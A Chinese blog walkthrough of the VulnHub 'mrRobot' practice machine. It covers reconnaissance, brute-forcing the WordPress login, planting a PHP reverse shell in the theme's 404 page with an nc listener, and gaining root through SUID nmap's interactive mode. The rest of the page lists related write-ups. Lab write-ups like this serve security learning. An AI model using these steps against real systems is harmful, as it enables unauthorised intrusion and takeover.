Vulnhub系列-mrRobot

最新推荐文章于 2024-05-11 11:36:26 发布
最新推荐文章于 2024-05-11 11:36:26 发布
阅读量2.4k 收藏
点赞数
分类专栏: Vulnhub系列 文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZXT2804567059/article/details/122151584
版权

靶机:192.168.12.129
kali: 192.168.12.128

一、信息收集

nmap -sV 192.168.12.129 –扫描开放端口
请添加图片描述
dirsearch -u http://192.168.12.129/ –扫下web目录

–robots.txt和wordpress登录框–
请添加图片描述

请添加图片描述
得到第一个key
请添加图片描述
fsocity.dic打开是个字典,猜测可以用来爆破wordpress登录框

–bp抓包,fsocity当作字典–请添加图片描述—80多万。。。。。。—
请添加图片描述
可以确定用户名是Elliot,那用户名不用爆了(长度4204估计回显的是密码错误)

爆破了n年(丢。密码在字典倒数第二个,倒过来就好爆了)
用户名:Elliot 密码:ER28-0652请添加图片描述
–登陆–
请添加图片描述find / -name php-reverse-shell.php kali自带的反弹shell
cd /usr/share/laudanum/php/ —复制php-reverse-shell.php的内容到wp中的404.php
请添加图片描述
修改ip,port为监听机kali的ip与端口
请添加图片描述
nc -lvp 4444 -监听本地4444端口
请添加图片描述
访问http://192.168.12.129/wp-admin/404.php

–成功弹shell–
python -c 'import pty; pty.spawn("/bin/bash")' –优化终端
请添加图片描述

二、提权(SUID提权)

cdhome文件夹存在robot用户,并且在其中发现登录密码
请添加图片描述

robot密码:abcdefghijklmnopqrstuvwxyz
请添加图片描述su - robot –登陆robot用户
请添加图片描述
Linux suid 提权

find / -perm -u=s -type f 2>/dev/null —查找suid文件
请添加图片描述`

ls -l /usr/local/bin/nmap –查看下nmap的权限是root权限
请添加图片描述
nmap --interactive –交互

!sh —成功root
请添加图片描述

{Yasso}
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
VulnHub--mrrobot
记录笔记
07-06 829
Vulnhub靶场--Mr robot 靶机
靶机渗透——Mr.Robot
1匹黑马
02-22 1550
文章目录任务环境信息收集漏洞挖掘漏洞利用权限获取权限提升 任务环境 攻击机:Kali2019 靶机:Mr.Robot 涉及知识点:暴力破解、WP404页面插马、nmap提权 信息收集 查一下靶机的IP与=以及开放的端口及内核版本 开放了22、80、443端口,我们去扫一下Web目录 我们用curl查看一下 这里给了一个字典和第一个key 漏洞挖掘 我们访问一下它的后台,这里要求我们输...
Vulnhub之mrRobot
weixin_42075643的博客
04-28 431
Vulnhub是一个很好的靶机平台,想看官网点这里 今天学习mrRobot,点击这里下载哦~ 这个比较简单,入门学习… VMware和VirtualBox都可以导入 成功后如图: 这里启用NAT模式 攻击机 kali 192.168.81.140 靶机:192.168.81.146 这个时候继续拿出祖传的nmap神器扫描: nmap -A 192.168.81.146 有80、443,直接浏览器访问: 继续看看有啥有价值的 先用dirsearch扫一下目录: 通过扫描发现是一个wp博客
最全看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot 1,2024年最新软件测试开发应该了解的Binder原理
最新发布
2401_84563933的博客
05-11 358
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagIntermediate(中级的)
Vulnhub靶机 MrRobot
菜浪马废的博客
04-14 243
arp-scan -l nmap -sV 192.168.0.143 主页是这个样子的 扫一下网站目录 dirb http://192.168.0.143 发现一个文件 拿到了第一个key 发现后台地址 访问了一下那个文件 拿到一个字典 拿到的字典文件太大 去重复化 重新生成一个字典 sort filename | uniq > filename 登录后台主页 找到...
Vulnhub靶场渗透-mrRobot
paidx0
09-21 941
前言 靶机ip(192.168.110.133) 攻击机ip(192.168.110.127) 网络NAT模式 直接开始 信息收集 漏洞挖掘 扫到的东西比较多,逐个看了一下,在robots.txt里找到第一个 flag,还发现一个字典 其次还找到 Wordpress的登录页 flag1 : 073403c8a58a1f80d943455fb30724b9 可以看看robots.txt里的字典内容,拿这个字典去爆破WordPress登录页 因为需要的时间比较长,就不再跑一边截图了,账号 elli
mrRobot.ova
07-16
SHA256: 1B69E9D8139D27387ED0EED112146FA6277272D1622A789E3CFEFBC456ABFA4F
MrRobot-Logo-Project:重新创建和收集“ Mr Robot”电视节目的虚构徽标作为矢量文件的项目
03-06
机器人先生徽标项目 正在进行的工作-随时贡献自己的力量! 重新创建和收集“ Mr Robot”电视节目的虚构徽标作为矢量文件的项目 徽标: 免责声明 这是一个由粉丝制作的项目,与任何正式的机器人先生电视节目或美国...
MrRobot:您可能在计算机上拥有的最愚蠢的程序
05-03
警告:运行该程序很危险。...python MrRobot.py [--OPTIONS] input_directory python MrRobot.py [--OPTIONS] input_file OPTIONS: -h --help : Displays this message. -v --verbose : Enables verbose mode.
渗透入门Mr-robott靶机练习.doc
07-09
渗透测试靶机Mr-Robot实践指南 渗透测试是一种网络安全测试,旨在评估计算机系统或网络的安全性。作为一名渗透测试员,需要掌握各种技术和工具来检测和利用系统漏洞。下面是Mr-Robot靶机的实践指南,旨在帮助初学者...
Radmin 3.5 Remote Control Software [MrRobot].rar_radmin_radmin 3
07-14
activator for radmin server 3.0
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章。 我们已经根据我们的经验执行并编制了此列表。 请与您的联系分享此信息,并直接向查询和反馈。 跟着我们 Kioptrix:1.3级 Kioprtix:5 安全操作系统:1 订书机 SickOS 1.1 SickOS 1.2 简单的 凯夫吉尔 米尔内特 牛头怪 空字节 VulnOS:1 VulnOS:2.0 新鲜地 塞德纳 恶梦 奥库斯 比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 狄娜 Born2Root G0rmint 基本渗透 BSides Vancuver:2018年 Toppo:1 Billu Box 2 基
No.23-VulnHub-Mr-Robot: 1-Walkthrough渗透学习
qq_34801745的博客
01-20 737
** VulnHub-Mr-Robot: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/mr-robot-1,151/ 靶机难度:中级(CTF) 靶机发布日期:2016年6月28日 靶机描述:根据表演,机器人先生。 此VM具有隐藏在不同位置的三个键。您的目标是找到全部三个。每个密钥逐渐难以找到。 VM不太困难。没有任何高级开发或逆向工程。该...
Mr-Robot1靶场练习&靶场推荐&小白入门练习靶场&渗透靶场&bp爆破&wordpress
jockerboss的博客
03-16 1627
Mr-Robot1靶场练习&靶场推荐&小白入门练习靶场&渗透靶场&bp爆破&wordpress
MrRobot渗透测试
ZK_1874的博客
03-24 307
MrRobot靶机渗透测试
看完这篇教你玩转靶机 MR-ROBOT: 1
清唪的博客
03-27 5109
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤。 靶机下载: 官网:https://download.vulnhub.com/mrrobot/mrRobot.ovahttps://download.vulnhub.com/mrrobot/mrRobot.ova
mrRobot CTF Walkthrough Writeup
qq_23026851的博客
01-17 638
OVA:https://www.vulnhub.com/entry/mr-robot-1,151/   用netdiscover 发现目标机的IP:192.168.164.164。   用浏览器上去逛一逛。   同时用nikto 扫描该主机。 发现它还使用wordpress。   访问/robots.txt 得到Key_1和一个字典。  ...
Vulnhub系列:Kioptix Level 1
Fuzz
07-30 1212
简介 Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台。 个人学习目的:1,方便学习更多类型漏洞。2,为0SCP做打基础。 下载链接 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 运行环境 kali:192.168.44.128 靶机:NAT模式 特别说明:有的小伙伴在打开虚拟机后,无法获取到靶机IP地址 这里特别说明:修改“Kioptix Level 1.vmx”配置文件中ethernet0.networkN
Vulnhub Node:1 详解
StriveBen的博客
09-03 1297
文章首发:https://xz.aliyun.com/t/2695 欢迎进群交流技术: 363034250 信息收集 arp-scan 用来发现系统和指纹识别的命令行工具。 从结果中可以看到node的ip是”192.168.92.129” 使用nmap对端口进行探测,如下图所示: 可知开放的端口有2个,分别是:22和3000,其中3000是个web服务; 详细banner信息...
vulnhub靶场渗透mrrobot漏洞复现
qq_61702710的博客
07-27 746
此 VM 有三个密钥隐藏在不同的位置。你的目标是找到所有三个。每个钥匙都越来越难找到。 VM 并不太困难。没有任何高级利用或逆向工程。该级别被认为是初级 - 中级。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

{Yasso}

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值